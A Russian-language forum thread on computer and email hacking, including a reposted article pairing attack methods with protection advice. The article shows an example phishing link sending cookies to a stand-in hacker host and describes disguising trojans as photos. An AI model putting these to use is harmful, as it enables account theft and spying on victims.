Jump to content

Взлом, как от ниво обезопасицца: до и после.


Recommended Posts

При наиболее удачном сочетании силы броска, размера компа, этажа и других факторов - могут появиться новые, не менее занятные проблемы:)
...романтика(с)
Link to comment
Share on other sites

При наиболее удачном сочетании силы броска, размера компа, этажа и других факторов
Гы :). Комп не выбрасывал - не знаю. Ресивер как-то выкинул с пятого этажа, дело было. И видак.

У нас в институте был один странный мальчик в техгруппе, так он во время приборки в студии выкинул в окно (два с половиной этажа, высоких - аудитории) большой разводной ключ, а потом подошёл к старшему технику и сказал: "Володя, знаешь, там внизу сейчас кто-то кричал..." (под окном - стройка, строители ходят). Надо было видеть Вовкино выражение лица :)...

Link to comment
Share on other sites

(с) Кто-то

 

Оказываеца ты еще и неумееш держать обещания...

 

По сабжу: сам бат сламать сложно (иво вообще не нужно ламать), для этого нужно получить доступ к компу прямой или удаленный, если пароль был сохраненн, то забирают пароль, если нет, то стявят кейлоггер (прога запоминающая нажатые клавиши, и денить сохраняющая все это), и через пару деньков забирают пароль оттуда).

Link to comment
Share on other sites

Оказываеца ты еще и неумееш держать обещания...

 

По сабжу: сам бат сламать сложно (иво вообще не нужно ламать), для этого нужно получить доступ к компу прямой или удаленный, если пароль был сохраненн, то забирают пароль, если нет, то стявят кейлоггер (прога запоминающая нажатые клавиши, и денить сохраняющая все это), и через пару деньков забирают пароль оттуда).

Вот такая я вот сволочь. Это между прочим в тему, Алукард. Байку прочитаешь - поймёшь о чем йа... это на тему компа за 8500 уей.

 

Мне интересно всё-таки как сломали так быстро... при том что у меня вирусов обнаружено не было...

Link to comment
Share on other sites

Объясняю популярно (читай внимательно то, что цитируеш) по всей видимости ктото получил доступ к твоему компу, а способобв этого много (дырявая незалатанная хр и тд и тп), узнать точно можно на месте (ты ведь толком ничего не объяснила), а так я могу только предполагать.

 

А вообще, раз ты нормально поладила со взломщиком спроси у него))

Link to comment
Share on other sites

Объясняю популярно (читай внимательно то, что цитируеш) по всей видимости ктото получил доступ к твоему компу, а способобв этого много (дырявая незалатанная хр и тд и тп), узнать точно можно на месте (ты ведь толком ничего не объяснила), а так я могу только предполагать.

 

А вообще, раз ты нормально поладила со взломщиком спроси у него))

Да мне и интересны способы! Всякие разные...

 

Не, это неэтично:(

Link to comment
Share on other sites

Хорошо попытаюс написать *нервно подергиваю глазом*, грю сразу, знаю не все и они постоянно пополняюца:

1. Сканируют удаленный комп на наличие уязвимостей, в зависимости от результатов, решают что делать дальше:

а) если дырявая винда (незалатанная тобиш), то с помощью так называемых эксплоитов (exploit) получают доступ. Эксплоиты пишутся под конкретную уязвимость, лиюо находятся в инете.

б) Если дыр нет, и хуже того стоит фаерволл, то пытаюца заслать троян (по почте, по асе, в расшаренные папки и тд). Троян берут свежий, тк обычно пососедству с фаерволом обычно живет антивирус). Троян выбирают в зависимости от поставленной задачи (можно тупо получить все доступные пароли, а можна и контроль над компом).

в) Если первые два способа не срабатывают, то в ход идет соц. инжинерия, тобиш знакомство с жертвой и "выманивание" данных непосредственно у нее.

 

З.ы. По этой теме можно написать не одну диссертацию...

Link to comment
Share on other sites

Хорошо попытаюс написать *нервно подергиваю глазом*, грю сразу, знаю не все и они постоянно пополняюца:

1. Сканируют удаленный комп на наличие уязвимостей, в зависимости от результатов, решают что делать дальше:

а) если дырявая винда (незалатанная тобиш), то с помощью так называемых эксплоитов (exploit) получают доступ. Эксплоиты пишутся под конкретную уязвимость, лиюо находятся в инете.

б) Если дыр нет, и хуже того стоит фаерволл, то пытаюца заслать троян (по почте, по асе, в расшаренные папки и тд). Троян берут свежий, тк обычно пососедству с фаерволом обычно живет антивирус). Троян выбирают в зависимости от поставленной задачи (можно тупо получить все доступные пароли, а можна и контроль над компом).

в) Если первые два способа не срабатывают, то в ход идет соц. инжинерия, тобиш знакомство с жертвой и "выманивание" данных непосредственно у нее.

 

З.ы. По этой теме можно написать не одну диссертацию...

Слушай, че ты такой нервный? Я фигею...

Я это уже читала.

Ты зачем тему то открывал если не можешь объяснить? Ну что мне говорит "незалатанная винда"? А эксплоит?

Объясни по русски, плз... Как от этого обезопаситься. Про пароли я уже слышала.

Если ты намерен истерить по поводу оффтопа и дергаться - я лучше свалю. Правда смысл создания топа всё равно не просекаю.

Link to comment
Share on other sites

Незалатанная винда - ОС, на которую неустанавливали обновления (либо ставили, но давно). Как от этого обезопасицца?) - поставить их)

Эксплоит - небольшая программка (обычно написанная на С/С++), дающая некоторые права в системе. Для проникновения использует ошибку в ОС либо в каком-нибудь кривом приложении. Деляцца на два основных вида: локальные и удаленные (думаю не стоит объяснять разницу).

 

Доступно объяснил Джер? У тебя ж вроде комп давно, а понимаешь в нем так мало...

Link to comment
Share on other sites

аа забыл)

Обезопасицца от эксплоитов лучше всего с помощью фаерволла.

Т.к. если на винду обновления выходят более-менее регулярно, то на ккорявые приложения их пишут редко...

Link to comment
Share on other sites

Доступно объяснил Джер? У тебя ж вроде комп давно, а понимаешь в нем так мало...
Вот так понятно. Я ж говорила уже не раз - я всё делаю чисто интуитивно, с терминами не дружу. Вообще. Абсолютно. Не нравятся они мне...
Link to comment
Share on other sites

О взломе и защите почты.

Вот нашел интересную статейку.

 

Способ 1. Социальная инженерия

 

Социальная инженерия - пожалуй самый простой способ получения чужого пароля, регистрации нужной программы и т.д. Принцип соц. инженерии состоит в правильном психологическом подходе к человеку, от которого вы собственно и собираетесь что-то получить. Самый примитивный способ такого подхода появился еще на заре инета. Пользователю посылали письмо якобы от администрации почтового сервиса с просьбой подтвердить свои персональные данные, и многие подтверждали. Даже сейчас в сети можно встретить примерно такие объявления:

"Я вот тут недавно обнаружил, что по адресу pass_recovery@mail.ru (адрес и сервер могут быть любыми прим. автора) сидит робот, который отвечает за восстановление паролей к сервису @MAIL.RU. Но что самое интересное, если послать ему специально составленное письмо, где указать реальный е-мail c паролем и второй который нужно вломать, то робот без проверки вышлет пароли сразу к двум ящикам..."

В настоящее время эти способы практически утратили свою актуальность. Пользователи уже не так наивны как прежде, да и администрация почтовых серверов предупреждает своих клиентов. Хотя и сейчас на них ведутся люди. Социальная инженерия может быть полезна в сочетании с другими способами взлома почтового ящика. Например усыпив бдительноть пользователя, можно заставить перейти его по "ядовитой" ссылке. Здесь главное не повторяться, а предлагать что-то новое.

 

Защита. Никогда не посылайте свои логин-пароль, в ответ на письма пришедшие от "администрации" какого-либо ресурса, где вы зарегистрированы (не зарегистрированы). А лучше вообще на них не отвечайте. Уж если сильно сомневаитесь, пошлите письмо администрации сервиса, а к письму приложите текст пришедшего вам письма (без пароля естественно), и только на тот e-mail, что указан на сервере. Помните главное правило - вводите ваши данные только в одном месте, на главной странице почтового сервера. Никогда не кликайте по ссылкам в письме, если у вас нет 100% доверия к его отправителю и содержимому. Лучше нажмите на ссылке правой кнопкой мыши, и выберете пункт "Сохранить объект как..." (для браузера Internet Explorer), а затем в офлайн просмотрите документ. Документы HTML, или попросту обычные Web странички, могут быть опасны при просмотре их онлайн (читайте следующий пункт).

 

Способ 2. Кража cookie и сессии пользователя

 

На мой взгляд наиболее реальный, быстрый и незаметный способ получить несанкционированный доступ к почте. Cookie (в переводе печенье) - это текстовые файлы хранящиеся на вашем компьютере в специальном месте, и содержащие какую-либо служебную информацию. Что нам надо знать о Cookie. Многие веб сервисы при заходе пользователя на их ресурс, пихают ему "печеньку" с его персональными данными. К примеру если вы в настройках на сервисе укажете выводить в таблице на странице 50 столбцов с данными, то эта информация запишется в Cookie, и при следующем заходе на этот сервис вам сразу покажут 50 столбцов. Но самое главное, прочитать данные из Cookie может только тот web сайт, который вам эту Cookie поставил. То есть куки поставленные на yandex.ru, не могут быть прочитаны рамблером, или каким нибудь superhack.com. Теперь переходим к главному. Когда мы на сайте проходим авторизацию, при входе на свой почтовый ящик сервер вешает нам Cookie, куда записывает номер сессии пользователя, или гораздо реже зашифрованный пароль (обычно алгоритмом md5), или еще реже (иногда встречается на небольших и древних сервисах) - ваш пароль записанный в открытом виде. Просто бери и пользуйся! Зачем это надо? Просто в противном случае, при переходе с одной страницы на другую, нам пришлось бы каждый раз заново проходить авторизацию (вводить логин-пароль). А так сервер читает из Cookie нашу сессию и сравнивает с сесией назначеной авторизованному пользователю. Если все окей, вы читаете свою почту. Если с паролем к почте все ясно, то в чем его отличие от сессии. Сессия - это просто набор из цифр и букв случайно сгенерированых сервером (как бы временный пароль). Одна копия записана у вас в куках, другая хранится на сервере. Причем сессия имеет "время жизни" (от нескольких минут, до нескольких часов), которое зависит от настроек сервиса. По истечении этого времени, копия сессии пользователя расположенная на сервере удаляется. И сессия записанная у пользователя окажется нерабочей (необходима новая авторизация). Вот пример сессии на почтовом сервисе rambler.ru:

http://mail.rambler.ru/Session/3112538-ru3lUHY9oFag9n79p4...

Теперь думаю суть ясна. Получив свежие пользовательские Cookie с какого нибудь lаmer@yаndеx.ru или lаmer@mаil.ru, мы сможем без проблем попасть на чужой ящик, даже если пользователь уже давно вышел из него (Не всегда. Об этом читайте в "защита").

Встает вопрос, как увести куки пользователя. Есть один способ. Пользователю посылается письмо в HTML формате, в которое вставляется специальный java-скрипт читающий содержание его Cookie и отсылающий эту информацию своему хозяину. Достаточно открыть такое письмо для просмотра в режиме online, и вы можете потеряеть свой ящик навсегда. Хотите протестировать свой ящик на уязвимость? Если да, пошлите аттачем себе HTML документ следующего содержания:

<html>

<head>

<script language="JavaScript">

alert(document.cookie)

</script>

</body>

</html>

 

 

Откройте это файл прямо на сервере в режиме онлайн, и если сервер не отфильтровал его содержимое, вы увидете свои Cookie (см. скриншот)

 

Атака на собственный почтовый ящик. Наша сессия как на ладони.

 

 

 

Как это получилось? Помните начало темы: "прочитать данные из Cookie может только тот web сайт, который вам эту Cookie поставил". Мы почитали Cookie Rambler.ru, а ведь открытый файл как раз и находится на Рамблере!

Но для взлома данный способ не пригоден, т.к. для получения сессии (Cookie) надо попасть в почтовый ящик. В реальной ситуации поступают так: JavaScript вставляется в само письмо, при этом письмо должно быть в HTML формате. Код выглядит как безобидная ссылка, но кликнув по ней ваши куки будут отправлены специальному скрипту, который их запишет и пошлет письмом хакеру (вариантов много). Чтобы заставить пользователя кликнуть ссылку, достаточно немного социальной инженерии. Вот пример кода:

<a href="http://хак.ру/hak.php?+<script>document.cookie</script>">www.rambler.ru/support/info.html</a>

 

 

Конечно данный код может фильтроваться сервером. Но ведь можно встроить скрипт в теги показа картинки. Пользователь увидит картинку, а хакер получит куки. Обычно такие скрипты пролетают на ура. Код приводить не буду, тематика статьи всеже защита а не нападение. Кому надо, тот найдет. Должен заметить, что на это попадались и еще попадуться даже опытные администраторы известных сайтов. Для редактирования полученных Cookie используют программу Cookie Editor. Вывод! При целенаправленной атаке на ваш ящик...

 

Защита. Вы замечали на вашем ящике кнопку "Выход", "Exit" и т.д. А знаете зачем она нужна? Она закрывает вашу сессию! Да-да, именно ту сессию, о которой писалось выше. Закрыв ящик "как положено", никто уже не сможет на него попасть без пароля, кража Cookie становится бесполезной. По возможности, никогда не читайте письма "онлайн". Сохраните письма на комп, а уже затем, отключившись от Инета, читайте. В этом случае никакой встроенный скрипт и прочая гадость вам не страшны. И поосторожнее кликайте по ссылкам в письмах. Текст ссылки и ее истинное назначение могут быть разными!

 

Способ 3. Протроянивание компьютера

 

Если у злоумышленника есть физический доступ к нужному компьютеру, то он 100% может получить не только пароль к вашей почте, но и следить за всеми действиями пользователя на нем (очень актуально для офисов, компьютерных клубов и интернет кафе). При отсутствии такого доступа можно послать шпиона прямо в аттаче к письму. Конечно запускать неизвестный EXE-шник врядли кто станет. А что если сделать иконку у программы как у текстового документы или JPEG рисунка, переименовать файл в Foto.jpg или в Info.txt, заполнить спец-поля при компилировании и запихнуть в архив. При этом данное вложение не должно быть неожиданным. К примеру вы на сайте знакомств познакомились с девушкой. После нескольких дней переписки, она врядли западозрит неладное в очередной фотке. Да и что к тому же, при запуске программы мешает показать ей настоящее фото (склеенное с программой), запустить шпиона, а затем удалить его тело из запущенного файла. При грамотном подходе не спасет и антивирус. Шансы злоумышленника вырастут во много раз (см. скриншот).

 

С виду обычная картинка, а внутри...

 

 

 

Шпион выдают строки "версия файла" и "производитель". У обычной картинки их нет.

 

Протроянить компьютер можно так же через уязвимости браузера или самой системы, с помощью соответствующего эксплоита. Но этот способ годится только если будующая жертва использует голую систему без установленных свежих сервис паков. Да и то многие выложенные публичные эксплоиты, на поверку не работают. Но как вариант, этот способ совсем не лишний.

 

Защита. Непонятно почему, но многие пользователи считают главным гарантом своей безопасности в сети - антивирус. Никакой антивирус с самой свежей базой не спасет вас от грамотно написанной и хорошо упакованной шпионской программы, которая ему незнакома. Трояны типа Смерть Ламера и используют ламеры. Человек опытный напишет свое, или в крайнем случае найдет приватный софт. В данном случае, вам намного полезнее фаервол. Если вы еще не знаете что это такое, закройте инет соединение, и не выходите в сеть пока его себе не поставите. Конечно опытный взломщик его может обойти, но от главных проблем он вас спасет. Выходите в сеть только под учетной записью с ограниченными правами. Для инета вам админские права не нужны, а вот многим шпионам для своей маскировки даже очень. Многие без них даже не запустятся. И ставте свежие заплатки от MICROSOFT. Не запускайте чужие аттачи к письмам. Помните, что программу можно замаскировать под картинку, или даже текстовый документ.

 

Способ 4. Взлом почтового сервера

 

Не секрет, что в любых крупных проектах всегда существуют баги. Вопрос только в том, насколько они опасны, и как оперативно администрация сервиса следит за безопасностью. Что уж говорить о почтовых сервисах средней руки, когда в свое время ошибки в безопасности были найдены даже на гигантах вроде MAIL.RU. Самые распространенные ошибки состоят в возможности ижектировать в исполняемые скрипты своего кода, приводдящие к тому или иному действию. К примеру, с помощью найденной ошибки, хакер может изменить код HTML документа на сервере, встроив свой. Помните Способ 2. Кража cookie и сессии пользователя. В этом случае еще до просмотра почты, ваши данные уплывут налево. Другой способ называется SQL-injection или си-кью-эл инжекция. Его основа состоит в возможности подмены sql запросов к базе данных сервера. Таким образом можно получать любые данные из серверной базы. Как вам к примеру полный список аккуантов рамблера с паролями в придачу. Если ошибок в интерфейсе не найдено, можно попробовать взломать сервер изнутри. Узнаем вервсию Аппача и других имеющихся служб, а затем ищем соответствующюю отмычку (эксплоит). Но это в теории. На практике поломать известные почтовые службы типа Yandex.ru, Rambler.ru, Mail.ru, вряд ли удасться, их админы не зря едят свой хлеб. Другое дело с проектами попроще. Допустим, что нужный нам аккуант зарегистрированн на нескольких форумах. Не для кого не секрет баги в одном из самых популярных форумов PhpBB (а есть и другие). Найти бажную версию и слить базу пользователей иногда дело нескольких минут (а как вы думали пополняют спам-листы). Очень может быть, что пароли к почте и форуму совпадут.

 

Защита. От взлома почтового сервера вас не защитит ничто. Советую выбирать для своей почты лишь крупные почтовые службы. Они своевременно обновляют свой серверный софт и следят за безопасностью почтовой системы. Не стоит использовать один пароль на все случаи жизни. Сейчас многие пользуются почтой через Web интерфейс. Да не спорю - это "красиво и удобно". Но! Забирать почту по протоколам POP3 или IMAP с помощью того же The Bat - быстрее, и главное безопаснее.

 

Способ 5. Программы для взлома почты

 

Единственными представителями программ подобного рода являются т.н. брутфорсеры. Такая программа простым перебором или по словарю пытается авторизоваться на почтовом сервере. Принцип их работы предельно прост. Если пароль не подходит, программа пробует новый пароль, и так до тех пор, пока верный пароль не будет найден. Тем не менее, реальность далека от идеала. Скорость перебора целиком зависит от ширины вашего канала. При Dial-up даже не стоит пробовать. При выделенке вас ожидает огромный интернет трафик. Если пароль сложный, и не менее 6 символов, цена в случае удачи окажется слишком высокой. И еще один самый главный момент. Сейчас практически везде используются системы, делающие брутфорс паролей невозможным в принципе. После нескольких неудачных попыток авторизации, вас просто пошлют лесом. Такие программы имеет смысл ипользовать лишь в тех случаях, кагда подбираемый пароль вам хотя бы частично известен, или вы примерно знаете его длинну и содержание.

Тем не мение судя по некоторым форумам и поисковым запросам, большое количество людей верят в чудо-программы по взлому почты. Поверьте моему опыту - создание таких программ в принципе невозможно (трояны, кейлоггеры, сниферы и формграбберы не в счет). Судите сами:

Теоретически допустим некий хакер нашел уязвимость на майл.ру, приводящую к несанкционированному доступу к чужой почте. Затем написал программу, где реализавал данную возможность. Пока хакер писал программу, пока о ней кто-то узнал, дыру закроют и программа превратится в пустышку. Не стоит так же забывать, что хакеры при взломе используют анонимные приватные прокси не ведущие логов. А вы полезете ломать майл.ру со своего компа? Даже если теоретически есть рабочая программа, то на следующий день ждите к себе домой наряд милиции. Прекрасный пример программа Rapidshare, которая вроде позволяет качать файлы с известной рапиды. Новые версии выходят чуть не каждую неделю, но рабочей я так и не видел. Рапида затыкает свои дыры раньше, чем успевает обновиться программа. Тем не мение то здесь, то там предлагают "Универсальные взломщики почты", некоторые еще и платные. Имейте в виду, что это или развод на деньги, или троян.

 

Защита. Устанавливайте нормальные пароли. Используйте для просмотра почты почтовые программы. Стоит попробовать, потом вас на Web интерфейс калачом не заманишь.

(брал отсюда http://www.mailinfo.ru/story06/11/08/8203376)

 

Статья предназначалась только для ознакомительных целей...

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

×
×
  • Create New...